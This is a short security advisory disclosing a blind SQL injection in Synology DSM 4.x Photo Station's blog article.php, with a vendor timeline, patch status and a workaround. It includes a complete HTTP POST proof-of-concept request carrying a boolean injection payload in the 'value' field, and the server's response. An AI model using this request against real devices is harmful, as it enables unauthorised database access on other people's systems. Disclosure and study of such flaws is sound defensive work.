Synology DSM4 Blind SQL Injection

Type securityvulns
Reporter Securityvulns
Modified 2014-05-05T00:00:00


~~~~~~ Title: Synology DSM Blind SQL Injection Version affected: <= 4.3-3827 Vendor: Synology Discovered by: Michael Wisniewski Status: Patched ~~~~~~

The file "/photo/include/blog/article.php" contains a Blind SQL Injection Vulnerability in the 'value' variable in the URL.

The vendor was contacted approximately 2 weeks ago. They reviewed the information and determined that it is vulnerable and a patch has been released. The DSM5 official release contains this patch, which was released earlier this week. An update for DSM4.x will be released later this month to address this issue in the 4.x line. The vendor also stated that it will be fixed in the next Photo Station hotfix for the 4.x line.

Work-around: If you don't use the blog, just rename the file.

~~~~~~ POST /photo/include/blog/article.php HTTP/1.1 Content-Length: 59 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: <ip>:80/ <> Cookie: PHPSESSID=<foo>; visit_day=<foo> Host: <foo> Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: /

list_type=label&value=1%20AND%20321%3d6%20AND%20812%3d812 ~~~~~~

It responds with:

All posts without a label Synology Blog 2008-01-01 00:00:00 Published by:Synology Blog


Timeline: - 3/1/14: Contacted Vendor with Details of Vulnerability and Exploit. - 3/2/14: Vendor responded with 'they are investigating'. - 3/4/14: Vendor responded with it being fixed in DSM5 and DSM4.x (4.x patched later in the month) - 3/10/14: DSM5 Released - 3/10/14: Contacted Vendor Final Time to make sure it's OK to release the information.